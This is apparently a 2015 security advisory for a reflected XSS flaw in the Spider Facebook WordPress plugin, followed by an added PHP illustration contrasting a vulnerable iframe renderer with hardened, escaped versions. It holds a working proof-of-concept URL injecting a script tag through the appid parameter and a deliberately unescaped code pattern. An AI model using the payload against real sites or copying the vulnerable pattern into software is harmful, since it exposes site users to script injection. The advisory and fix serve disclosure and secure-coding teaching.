Title: WordPress 'WordPress Facebook' plugin - XSS
Version: 1.0.10
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/spider-facebook/
Contacted WordPress: 2015/01/26

==========================================================
## Description:
==========================================================

Spider Facebook is a WordPress integration tool for Facebook. It includes all the available Facebook social plugins and widgets to be added to your web

==========================================================
## XSS:
==========================================================

Some parameters are shown unsanitized, making XSS possible.

PoC: Log in as admin and submit one of the following forms:









Also works with this target url: http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook&


Also works with http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& and http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook&

You can also just visit the following URL (no login required):

http://[URL]/?task=registration&g_red=1&type=auto&appid=%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E

==========================================================
## Solution
==========================================================

Update to version 1.0.11
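The pattern behind this advisory, as an added illustration that is not the Spider Facebook plugin's own code (the plugin source is not shown on this page): a query parameter concatenated raw into an iframe attribute, next to the same output built with input validation and WordPress escaping, plus a hardened shape for the admin-ajax handlers. It assumes it runs inside WordPress. The parameter names `appid` and `type` and the action names come from the advisory's URLs; the iframe context is inferred from the payload's `"></iframe>` prefix; the like.php URL, the `manual` option, the `search` parameter and the nonce action name are hypothetical.

```php
<?php
// Added illustration of the pattern behind the advisory; not the Spider Facebook
// plugin's own code (which is not shown on the page). Assumes it is loaded inside
// WordPress so esc_url(), esc_attr(), add_query_arg(), etc. exist.
// Parameter names appid/type are from the PoC URL; the iframe context is inferred
// from the payload's "></iframe> prefix; the like.php URL, the 'manual' option,
// the 'search' parameter and the nonce action name are hypothetical.

// Vulnerable pattern: a query-string value is concatenated into an HTML attribute
// without validation or escaping. A value such as "><script>alert(1)</script>
// closes the src attribute and the <iframe>, and the browser runs the script.
function sf_render_frame_vulnerable( array $request ) {
	$appid = isset( $request['appid'] ) ? $request['appid'] : '';
	$type  = isset( $request['type'] ) ? $request['type'] : 'auto';
	return '<iframe src="https://www.facebook.com/plugins/like.php?app_id=' . $appid
		. '&type=' . $type . '"></iframe>';
}

// Hardened pattern: reject input that does not match the expected shape, allow-list
// enumerated options, then escape for the exact context the value lands in.
function sf_render_frame_hardened( array $request ) {
	// A Facebook app id is a string of digits; strip everything else rather than
	// trying to escape arbitrary markup.
	$appid = isset( $request['appid'] ) ? preg_replace( '/\D+/', '', (string) $request['appid'] ) : '';

	// Only known values are accepted; anything else falls back to the default.
	$allowed_types = array( 'auto', 'manual' );
	$type = ( isset( $request['type'] ) && in_array( $request['type'], $allowed_types, true ) )
		? $request['type'] : 'auto';

	// add_query_arg() builds and encodes the query; esc_url() is the correct escaper
	// for a URL placed in an attribute (it also drops javascript: and similar schemes).
	$url = add_query_arg(
		array( 'app_id' => $appid, 'type' => $type ),
		'https://www.facebook.com/plugins/like.php'
	);
	return '<iframe src="' . esc_url( $url ) . '"></iframe>';
}

// The admin-ajax.php actions named in the advisory (selectpostsforfacebook,
// selectpagesforfacebook) need the same treatment on any value they reflect, plus
// the checks every privileged AJAX handler should have: a nonce and a capability.
// Hypothetical handler; the real plugin's reflected parameters are not on the page.
add_action( 'wp_ajax_selectpostsforfacebook', 'sf_hardened_select_posts' );
function sf_hardened_select_posts() {
	check_ajax_referer( 'sf_select_posts', 'nonce' ); // dies on a missing or invalid nonce
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( -1, 403 );
	}
	$search = isset( $_GET['search'] ) ? sanitize_text_field( wp_unslash( $_GET['search'] ) ) : '';
	// Escape at output time for the attribute context even though the value was
	// sanitized on input; the two steps guard against different mistakes.
	echo '<input type="text" name="search" value="' . esc_attr( $search ) . '">';
	wp_die();
}
```

The two renderers differ in where trust is placed: the vulnerable one trusts the request and leaves the browser to interpret whatever arrives, while the hardened one narrows each value to its expected shape first and then escapes for the attribute context, so a stray quote or angle bracket can never terminate the markup. The no-login PoC in the advisory shows why the front-end path matters most: a capability check alone would not have helped there, only output escaping does.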